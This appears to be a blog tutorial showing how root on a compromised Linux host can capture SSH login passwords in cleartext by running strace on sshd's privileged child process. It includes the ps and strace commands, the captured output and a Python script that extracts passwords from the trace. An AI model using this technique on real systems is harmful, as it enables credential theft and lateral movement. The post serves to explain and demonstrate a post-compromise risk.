strace is a Linux debugging tool that attaches to a running process (via ptrace) and prints every system call the process makes, together with its arguments and return values.
This is not a vulnerability in itself: attaching strace to a root-owned process such as sshd already requires root (or CAP_SYS_PTRACE, with ptrace_scope permitting it), so it gives the attacker no privilege they did not have. But if the system is already compromised, every user who logs in to it over ssh with a password hands that password, in cleartext, to whoever owns the box, and passwords tend to be reused elsewhere. That can turn one compromised host into a big mess.
For this demonstration, I am running sshd on my laptop.
ssh debojit@localhost
debojit@localhost’s password:
Permission denied, please try again.
sshd forks a child process to handle each incoming connection. With privilege separation (the default), that child keeps running as root and shows up as "sshd: user [priv]", and it in turn spawns an unprivileged "sshd: user [net]" process that talks to the client over the network. I can find both with:
ps aux | grep ssh
root       973  0.0  0.1  65520  6228 ?        Ss   11:41   0:00 /usr/sbin/sshd -D
debojit   8407  0.0  0.1  44916  5300 pts/18   S+   12:06   0:00 ssh debojit@localhost
root      8408  0.0  0.1  96124  6648 ?        Ss   12:06   0:00 sshd: debojit [priv]
sshd      8409  0.0  0.0  66864  3036 ?        S    12:06   0:00 sshd: debojit [net]
Now I can use strace to spy on the [priv] child (PID 8408). The unprivileged [net] process does not check the password itself; it forwards it over a socketpair to the [priv] monitor, which verifies it against the system. So the password shows up as a read() on that socket inside the [priv] process.
Here is the strace output:
sudo strace -p 8408
strace: Process 8408 attached
restart_syscall(<... resuming interrupted poll ...>) = 1
read(6, "\0\0\0\r", 4)                  = 4
read(6, "\f\0\0\0\10mysecure", 13)      = 13
getuid()                                = 0
The second read() is the interesting one. The first read() pulled a 4-byte message length (\0\0\0\r, i.e. 13), and the next read() pulled the 13-byte message itself: a one-byte message type (\f, i.e. 12) followed by an SSH wire string holding the password, namely a 4-byte length (\0\0\0\10, i.e. 8) and the 8 bytes "mysecure". So my ssh password is "mysecure". Note that strace truncates printed strings at 32 bytes by default; pass -s with a larger value if you expect long passwords.
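As an added example (this is not code from the original post): a small Python script that takes strace output like the capture above, reassembles the read() calls on the privsep socket into monitor messages and pulls out the password. It assumes the message layout visible in the capture (4-byte big-endian length, 1-byte message type, then an SSH wire string) and that the type value 12 is OpenSSH's MONITOR_REQ_AUTHPASSWORD from monitor.h; the sample input is constructed from the lines above.

```python
import re

# Constructed sample input: the strace lines from the post, as one text blob.
# In a real run you would pipe `sudo strace -s 256 -p <pid of "sshd: user [priv]"> 2>&1`
# into this script instead.
SAMPLE_STRACE = r'''strace: Process 8408 attached
restart_syscall(<... resuming interrupted poll ...>) = 1
read(6, "\0\0\0\r", 4) = 4
read(6, "\f\0\0\0\10mysecure", 13) = 13
getuid() = 0
'''

# Message type the unprivileged [net] process uses when it hands a password to the
# [priv] monitor. Assumed from OpenSSH's monitor.h (MONITOR_REQ_AUTHPASSWORD = 12);
# it matches the leading "\f" (0x0c) byte in the post's capture.
MONITOR_REQ_AUTHPASSWORD = 12

# One-character C escapes as strace prints them; octal (\NNN) and hex (\xHH) are
# handled separately below.
_SIMPLE_ESCAPES = {'n': 10, 't': 9, 'r': 13, 'f': 12, 'v': 11, 'a': 7, 'b': 8,
                   '"': 34, '\\': 92}

# A read() line: fd, quoted buffer, optional "..." if strace truncated it, count, result.
_READ_RE = re.compile(r'^read\((\d+), "(.*)"(\.\.\.)?, \d+\)\s*=\s*(-?\d+)')


def unescape_strace(s):
    """Turn strace's escaped string representation back into the raw bytes."""
    out = bytearray()
    i = 0
    while i < len(s):
        c = s[i]
        if c != '\\':
            out.append(ord(c))
            i += 1
            continue
        i += 1
        nxt = s[i]
        if nxt in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[nxt])
            i += 1
        elif nxt == 'x':
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            # Octal escape: one to three digits, e.g. \0, \10, \377.
            j = i
            while j < len(s) and j < i + 3 and s[j] in '01234567':
                j += 1
            if j == i:  # unknown escape: keep the character literally
                out.append(ord(nxt))
                i += 1
            else:
                out.append(int(s[i:j], 8))
                i = j
    return bytes(out)


def read_payloads(strace_text):
    """Yield (fd, bytes) for every complete, successful read() in the trace."""
    for line in strace_text.splitlines():
        m = _READ_RE.match(line)
        if not m or int(m.group(4)) <= 0:
            continue
        if m.group(3):
            # strace cut the buffer short (-s too small); a partial message would
            # desynchronise the stream, so skip it rather than guess.
            continue
        yield int(m.group(1)), unescape_strace(m.group(2))


def parse_monitor_messages(stream):
    """Split a privsep socket byte stream into (type, payload) messages.

    Wire format as seen in the capture: 4-byte big-endian length, then a
    1-byte message type, then the payload.
    """
    msgs = []
    off = 0
    while off + 4 <= len(stream):
        length = int.from_bytes(stream[off:off + 4], 'big')
        off += 4
        if length < 1 or off + length > len(stream):
            break  # truncated capture: stop rather than guess
        msgs.append((stream[off], stream[off + 1:off + length]))
        off += length
    return msgs


def ssh_string(payload):
    """Decode an SSH wire string: 4-byte big-endian length followed by the bytes."""
    n = int.from_bytes(payload[:4], 'big')
    if len(payload) < 4 + n:
        raise ValueError('short SSH string')
    return payload[4:4 + n]


def passwords_from_strace(strace_text):
    """Return [(fd, password)] for every password-auth request found in the trace."""
    streams = {}
    for fd, data in read_payloads(strace_text):
        streams.setdefault(fd, bytearray()).extend(data)
    found = []
    for fd, stream in streams.items():
        for mtype, payload in parse_monitor_messages(bytes(stream)):
            if mtype == MONITOR_REQ_AUTHPASSWORD:
                found.append((fd, ssh_string(payload).decode('utf-8', 'replace')))
    return found


if __name__ == '__main__':
    for fd, pw in passwords_from_strace(SAMPLE_STRACE):
        print('fd %d: password %r' % (fd, pw))
```

Two practical points the script bakes in: it drops any read() that strace truncated (the trailing "..."), because a partial message would throw off every length field after it, so run strace with a large -s; and it reassembles per file descriptor, since the length prefix and the message body can arrive in separate read() calls, exactly as in the capture above.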
Thanks for reading :) cheers-